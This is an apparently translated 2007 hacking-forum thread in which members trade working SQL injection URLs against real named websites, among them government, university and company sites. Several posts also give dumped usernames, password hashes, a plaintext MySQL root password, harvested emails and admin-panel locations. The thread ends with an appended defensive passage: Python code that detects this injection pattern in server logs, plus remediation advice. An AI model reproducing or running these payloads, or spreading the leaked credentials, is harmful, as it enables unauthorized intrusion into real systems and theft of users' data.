SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Hardware
    Code:
    http://www.legionhardware.com/document.php?id=-11111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,char(58),password),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users/*
    
    Democracy in America
    Code:
    http://www.dfalink.com/event.php?id=-11111+UNION+SELECT+1,concat(email,char(58),password),3,4,5,6,7,8,9,10,concat(USER(),char(58),VERSION(),char(58),DATABASE()),12,13,14,15,16,17,18,19,20,21,22,23,24+from+members/*
    
    Though there are problems with the password encoding.
     
  2. cRiLaZ

    cRiLaZ Member

    Joined:
    17 Oct 2006
    Messages:
    21
    Likes Received:
    15
    Reputations:
    18
    http://www.ze-linux.org/index.php?id_news=-825+union+select+666/*
     
    1 person likes this.
  3. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    mc-laren.ru
    Code:
    http://www.mc-laren.ru/news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12+from+users/*
    and there's a forum there too...
     
    2 people like this.
  4. REx07

    REx07 New Member

    Joined:
    1 May 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    1
    For those who DON'T like cosmetics:
    Code:
    _http://www.wizaz.pl/porady/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
    The site's admin panel is here:
    _http://www.wizaz.pl/porady/admin.php
     
    1 person likes this.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    70 emails)))
    kontrudar.ru
    Code:
    http://www.kontrudar.ru/material.php?id=15+and+0=-1+union+select+email,2,3,4,5,null,7,8,9,10,11,12,13+from+ic_subscribers+limit+70,1/*
    title

    you need to remove the spaces
     
    #2125 n1†R0x, 4 May 2007
    Last edited: 4 May 2007
    2 people like this.
  6. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    Alumni Club of the Moscow Institute of Physics and Technology

    www.miptclub.ru

    Code:
    http://miptclub.ru/inner/modules/gallery/gallery.php?act=show_gallery&id=-1+union+sel ect+convert(version ()+using+binary)/ *
    Admin: amavis
    Password(hash):623deab31fd6dd48

    Admin panel: www.miptclub.ru/admin

    Time to start a collection - last time it was the MGIMO alumni association, now MIPT! :D :D
     
    1 person likes this.
  7. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    __http://www-illigal.ge.uiuc.edu/system/reports/abstract.php?id=339992+union+select+1,2,3,4,5,6,AES _DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10--
     
    2 people like this.
  8. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Center For Law and Social Policy
    Code:
    http://www.clasp.org/publications.php?id=-1111+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
    
     
    1 person likes this.
  9. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    KVN at NSU
     
  10. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Football. Luch-Energiya (unofficial site)

    Site: http://luch-vlad.ru/index.php
    vulnerability: http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id='
    guessed tables: jos_users
    guessed fields: username,password,email,name
    1960 'organisms' (users)
    admin:8e16abc167627ba17495079c609efa6d (111280)
    admin panel
    forum: 2155 'organisms' (users)
     
    #2130 Серенький, 4 May 2007
    Last edited: 4 May 2007
    1 person likes this.
  11. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    Well, first of all, not all sites are interesting or well-visited, not all of them are vulnerable, and on many of the vulnerable ones you can't always guess the names of useful tables. And even more rarely do you manage to get into the admin panel and use a shell.
    Plus there are sometimes interesting quirks, filtering and so on.
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    803
    Likes Received:
    710
    Reputations:
    301
    Dracula4ever, do at least one injection on ASP
     
    1 person likes this.
  13. REx07

    REx07 New Member

    Joined:
    1 May 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    1
    As for ASP...
    Here's some Turkish stuff:

    _http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

    to get the password, change it to "sifre"

    The admin panel is lying around here:
    http://www.banaz.bel.tr/admin/kontrol.asp
     
  14. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    .gov
    Code:
    http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*
    
     
    2 people like this.
  15. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Football.

    Site: www.liverpoolfc.ru
    vulnerability: http://www.liverpoolfc.ru/news.php?id=1673'
    guessed tables: users
    guessed fields: user_name,user_pass,user_id
    1:Jari:034054de62d75ca7
    admin panel
    Not finished:
    http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - problems with output
     
    1 person likes this.
  16. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+2,1/*
    
    .gov
    Code:
    http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*
    
    MySQL root:zaq12345
     
    #2136 maxster, 5 May 2007
    Last edited: 8 May 2007
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,128
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username,9,10,11+from+members/*
    user:perfilov
    password:248192
    email:dood@webserver.com
    Code:
    http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
     
    1 person likes this.
  18. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    nero.com

    Code:
    http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/*
    stpatsfc.com
    Code:
    http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*
     
    #2138 Dracula4ever, 5 May 2007
    Last edited: 5 May 2007
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    803
    Likes Received:
    710
    Reputations:
    301
    Dracula, both of those are the oldest of old news - http://hlamidnik.h18.ru/SQLS.html
     
  20. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    31
    Likes Received:
    49
    Reputations:
    3
    www.sdg.ncsa.uiuc.edu
    National Center for Supercomputing Applications (NCSA)

    Code:
    http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database()),3,4,5,6,7,8,9,10/*
     
    1 person likes this.
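The requests collected across this thread share one shape: a negative id, a UNION SELECT padded with numeric columns, concat() with char(58) or 0x3a to join credentials, and a trailing /* (or --) terminator, sometimes with /**/ in place of spaces as in post 4. The following is an added defender-side example, not code from the thread, that flags that shape in web-server access logs; the log lines are constructed and the hosts and paths are not the ones posted here.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines shaped like the requests in this thread
# (placeholder paths; not the original URLs).
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2007:12:00:01 +0000] "GET /news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4+from+users/* HTTP/1.1" 200 5120
10.0.0.6 - - [04/May/2007:12:00:02 +0000] "GET /porady/x.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password/**/from/**/users/**/ HTTP/1.1" 200 4711
10.0.0.7 - - [04/May/2007:12:00:03 +0000] "GET /news.php?id=1673 HTTP/1.1" 200 6000
10.0.0.8 - - [04/May/2007:12:00:04 +0000] "GET /gallery.php?id=-1+union+select+1,2,concat(USER(),char(58),VERSION())/* HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_SELECT_RE = re.compile(r'\bunion\b.*\bselect\b', re.I)
# concat()/char(58)/0x3a: the credential-joining helpers used in the posts above.
CONCAT_RE = re.compile(r'\bconcat\s*\(|\bchar\s*\(\s*58\s*\)|0x3a', re.I)
COMMENT_TAIL_RE = re.compile(r'/\*\s*$|--\s*$')

def normalize(query: str) -> str:
    """URL-decode, then treat inline comments as whitespace so the
    '/**/union/**/select' variant matches the same rule as '+union+select'."""
    decoded = unquote_plus(query)
    decoded = re.sub(r'/\*.*?\*/', ' ', decoded)
    return re.sub(r'\s+', ' ', decoded).strip()

def score_request(path: str) -> dict:
    """Return the indicators found in one request path; 'suspicious' is set
    when a UNION ... SELECT survives normalization."""
    query = path.partition('?')[2]
    norm = normalize(query)
    indicators = []
    if UNION_SELECT_RE.search(norm):
        indicators.append('union_select')
    if CONCAT_RE.search(norm):
        indicators.append('concat_exfil')
    if COMMENT_TAIL_RE.search(unquote_plus(query)):
        indicators.append('comment_terminator')
    if indicators and re.search(r'=-\d+', query):
        indicators.append('negative_id')
    return {'path': path, 'indicators': indicators,
            'suspicious': 'union_select' in indicators}

def scan_log(log_text: str) -> list:
    """Score every request line in an access log."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings.append(score_request(m.group(1)))
    return findings
```

Such a check belongs in log review or a WAF rule as a signal, not a fix; the fix for the pattern shown in this thread is parameterized queries on the id parameter and no application account with read access to mysql.user.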